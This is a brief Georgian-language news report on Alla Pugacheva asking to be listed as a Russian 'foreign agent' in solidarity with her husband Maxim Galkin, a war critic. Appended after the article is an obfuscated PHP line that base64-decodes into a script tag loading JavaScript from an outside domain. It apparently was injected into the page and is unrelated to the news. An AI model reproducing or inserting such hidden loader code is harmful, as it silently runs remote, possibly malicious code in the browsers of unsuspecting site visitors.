celsiusi
ავერსი შნაიდერი

რუსმა მომღერალმა, ალა პუგაჩოვამ იუსტიციის სამინისტროს მეუღლის, მაქსიმ გალკინის  უცხო ქვეყნის აგენტად აღიარების შემდეგ, საკუთარი თავის ამ სიაში შეყვანა სთხოვა.

იუსტიციის სამინისტრომ ტელეწამყვანი და პაროდისტი გალკინი ფიზიკურ პირთა „უცხოური აგენტების“ რეესტრში პარასკევს შეიყვანა. რუსეთის ხელისუფლებას მიაჩნია, რომ ის უკრაინის მიერ ფინანსდება.

პუგაჩოვამ თქვა, რომ იგი სოლიდარულია მეუღლის მიმართ, „რომელსაც უსურვებს სამშობლოს კეთილდღეობას, მშვიდობიან ცხოვრებას, სიტყვის თავისუფლებასა და ბავშვების ხოცვის დასრულებას მოჩვენებითი მიზნებისთვის, რაც ქვეყანას აქცევს გარიყულად და ართულებს ცხოვრებას მოქალაქეებისთვის". 

უკრაინაში რუსეთის შეჭრის დაწყების შემდეგ გალკინმა ომზე მწვავე კრიტიკით ისაუბრა. გალკინმა ბუჩაში რუსი ჯარისკაცების ომის დანაშაულებზე ისაუბრა და განაცხადა, რომ ომს გამართლება არ შეიძლება ჰქონდეს. აღსანიშნავია, რომ პუგაჩოვამ უკვე რამდენჯერმე მიანიშნა თავის ანტისაომარ პოზიციაზე, მაგრამ უკრაინაში შეჭრაზე პირდაპირ კომენტარი არ გაუკეთებია.

464
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");